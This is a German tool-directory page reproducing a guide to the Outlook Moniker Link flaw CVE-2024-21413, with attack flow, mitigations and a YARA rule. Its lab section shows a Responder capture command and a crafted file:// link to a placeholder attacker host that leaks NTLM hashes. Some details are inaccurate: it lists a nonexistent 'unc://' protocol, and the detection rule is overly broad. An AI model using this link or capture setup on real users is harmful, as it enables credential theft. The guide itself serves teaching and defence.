Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Moniker-Link--CVE-2024-21413- — Bildungsleitfaden zu CVE-2024-21413, einer Zero-Click-Outlook-Sicherheitslücke, die NTLM-Credential-Diebstahl über Moniker-Links ermöglicht. Behandelt Ausnutzung, Erkennung mit YARA und Abwehrstrategien. | Kitploit
Tools/GitHubGitHub/bhatbhupendra/moniker-link--cve-2024-21413-
Passwort-CrackingPhishing-ToolsSchwachstellenanalyseExploitationIDS/IPS-UmgehungLaterale BewegungPenetrationstestsLernen & BildungRed Teaming

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
E-Mail-Sicherheit
GitHubbhatbhupendra/moniker-link--cve-2024-21413-

Moniker-Link--CVE-2024-21413-

Bildungsleitfaden zu CVE-2024-21413, einer Zero-Click-Outlook-Sicherheitslücke, die NTLM-Credential-Diebstahl über Moniker-Links ermöglicht. Behandelt Ausnutzung, Erkennung mit YARA und Abwehrstrategien.

Repository anzeigen
vor 3 MonatenNoch nicht geprüft

🔗 Moniker Link (CVE-2024-21413) – Ein praktischer Leitfaden zur Outlook Zero-Click-Schwachstelle


📌 1. Einleitung

CVE-2024-21413, allgemein als Moniker-Link-Schwachstelle bezeichnet, ist ein kritischer Sicherheitsfehler in Microsoft Outlook, der es Angreifern ermöglicht, Benutzeranmeldeinformationen ohne jegliche Interaktion preiszugeben.

Im Gegensatz zu herkömmlichen Phishing-Angriffen kann diese Schwachstelle bereits durch Vorschau einer E-Mail ausgelöst werden, was sie in Unternehmensumgebungen besonders gefährlich macht.

Das Problem resultiert aus der Art und Weise, wie Outlook Moniker-Links verarbeitet, was zu unbeabsichtigten Authentifizierungsversuchen gegenüber angreifergesteuerten Systemen führt.


🧠 2. Schlüsselkonzepte

Das Verständnis der folgenden Konzepte ist wichtig:

🔹 Moniker-Link

Ein Windows-spezifischer Mechanismus, der es Anwendungen ermöglicht, auf externe Ressourcen über Protokolle wie zu verweisen:

  • file://
  • unc://

🔹 NTLM-Authentifizierung

  • Ein veraltetes Windows-Authentifizierungsprotokoll
  • Sendet automatisch gehashte Anmeldeinformationen beim Zugriff auf entfernte Ressourcen
  • Anfällig für Erfassung und Relay-Angriffe von Anmeldeinformationen

🔹 UNC-Pfad (Universal Naming Convention)

root@kitploit:~
\\attacker-server\share

Wird verwendet, um auf gemeinsam genutzte Ressourcen über ein Netzwerk zuzugreifen. Bei dieser Schwachstelle wird es missbraucht, um Authentifizierungsanfragen zu erzwingen.

🔹 Umgehung der geschützten Ansicht

Die Geschützte Ansicht von Outlook soll potenziell unsichere Inhalte isolieren. Diese Schwachstelle umgeht diesen Schutz und ermöglicht den Zugriff auf externe Ressourcen.


⚙️ 3. Funktionsweise

Angriffsablauf (Schritt für Schritt)

  1. Erstellen der Nutzlast

    • Der Angreifer bettet einen bösartigen Moniker-Link (z. B. file://attacker-server/share) in eine E-Mail ein.
  2. Zustellung

    • Die E-Mail wird an das Opfer gesendet.
  3. Auslösung

    • Das Opfer zeigt die E-Mail in Outlook in der Vorschau an oder öffnet sie.
  4. Automatische Verarbeitung

    • Outlook verarbeitet den Link ohne Benutzerinteraktion.
  5. Authentifizierungsanfrage

    • Windows versucht eine NTLM-Authentifizierung gegenüber dem Server des Angreifers.
  6. Offenlegung der Anmeldeinformationen

    • Der Angreifer erfasst den NTLM-Hash.

Angriffsablauf-Diagramm

root@kitploit:~
[Angreifer]
    |
    | 1. Sende präparierte E-Mail
    v
[Opfer Outlook]
    |
    | 2. Automatische Verarbeitung des Moniker-Links
    v
[Windows-System]
    |
    | 3. NTLM-Authentifizierungsversuch
    v
[Angreifer-Server]
    |
    | 4. Erfasse NTLM-Hash
    v
[Missbrauch von Anmeldeinformationen / Laterale Bewegung]

🌍 4. Auswirkungen in der Praxis

Häufige Angriffsszenarien

  • Gezielte Phishing-Kampagnen gegen Organisationen
  • Erfassung von Anmeldeinformationen in Unternehmensnetzwerken
  • Erstzugang für laterale Bewegung

Ziele des Angreifers

  • Erfassen von NTLM-Hashes
  • Weiterleitung der Authentifizierung an interne Dienste
  • Erhöhung von Berechtigungen im Netzwerk

🛠️ 5. Werkzeuge und Technologien

Angriffs- / Forschungswerkzeuge

  • Responder — Erfasst NTLM-Authentifizierungs-Hashes
  • Impacket — Toolkit zur Netzwerkausnutzung
  • ntlmrelayx.py — Führt NTLM-Relay-Angriffe durch

Verteidigungswerkzeuge

  • Microsoft Defender — Endpunkterkennung und -reaktion
  • Wireshark — Netzwerkverkehrsüberwachung
  • Sysmon — Erweiterte Systemereignisprotokollierung

💻 6. Praxisbeispiel (Nur Laborumgebung)

⚠️ Nur in kontrollierten Laborumgebungen durchführen

NTLM-Erfassungsdienst starten

root@kitploit:~
sudo responder -I eth0

Beispiel für bösartigen Link

root@kitploit:~
<a href="file://attacker-ip/share">Open Document</a>

Erwartete Ausgabe

root@kitploit:~
[SMB] NTLMv2 Hash captured
User: victim

🛡️ 7. Erkennung (YARA-Regel)

Eine Erkennungsregel wurde von Florian Roth entwickelt, um Ausnutzungsversuche mit Moniker-Links zu identifizieren.

YARA-Regelbeispiel

root@kitploit:~
rule Outlook_MonikerLink_CVE_2024_21413
{
    meta:
        description = "Detects Outlook Moniker Link exploitation via file:// or UNC paths"
        author = "Florian Roth"
        reference = "CVE-2024-21413"
    
    strings:
        $a = "file://"
        $b = "\\\\"
    
    condition:
        any of them
}

Anwendungsfälle für die Erkennung

  • E-Mail-Gateway-Scanning
  • SIEM-Warnungsgenerierung
  • Jagd nach verdächtigen Links (Threat Hunting)

🛡️ 8. Eindämmung und bewährte Verfahren

Patch-Management

  • Sicherheitsupdates von Microsoft umgehend anwenden

Härtung der Authentifizierung

  • NTLM wo möglich deaktivieren
  • Kerberos-Authentifizierung erzwingen

Netzwerkkontrollen

  • Ausgehendes SMB (TCP 445) zu externen Netzwerken blockieren
  • Unnötige ausgehende Verbindungen einschränken

E-Mail-Sicherheit

  • file://- und UNC-basierte Links filtern oder bereinigen
  • Erweiterte E-Mail-Bedrohungsschutzlösungen verwenden

Überwachung und Erkennung

  • Ausgehende Authentifizierungsversuche überwachen
  • Ungewöhnlichen SMB-Verkehr protokollieren und alarmieren

⚠️ 9. Häufige Fehler

  • Annahme, dass Benutzerinteraktion erforderlich ist
  • Ignorieren von NTLM-bezogenen Risiken in modernen Umgebungen
  • Sich ausschließlich auf Antivirus ohne Netzwerkkontrollen verlassen
  • Verzögerung der Patch-Bereitstellung

🧾 10. Fazit

CVE-2024-21413 zeigt, wie tief integrierte Systemverhaltensweisen (wie automatische Authentifizierung) durch scheinbar harmlose Eingaben wie E-Mail-Links ausgenutzt werden können.

Wichtige Erkenntnisse

  • Zero-Click-Schwachstelle – keine Benutzerinteraktion erforderlich
  • Nutzt Outlooks Verarbeitung von Moniker-Links aus
  • Führt zur Offenlegung von NTLM-Anmeldeinformationen
  • Erkennbar mit YARA und Netzwerküberwachung
  • Durch Patchen und richtige Konfiguration verhinderbar

📚 11. Weiterführende Literatur

  • Microsoft-Sicherheitshinweis – CVE-2024-21413
  • Impacket-Dokumentation (NTLM-Relay-Angriffe)
  • YARA-Dokumentation
  • OWASP-Authentifizierungs-Spickzettel

💡 Empfehlung: Reproduzieren Sie diese Schwachstelle in einer virtuellen Laborumgebung (z. B. Windows-VM + Angreifer-VM), um die Angriffskette und Verteidigungsstrategien vollständig zu verstehen.

Tool herunterladen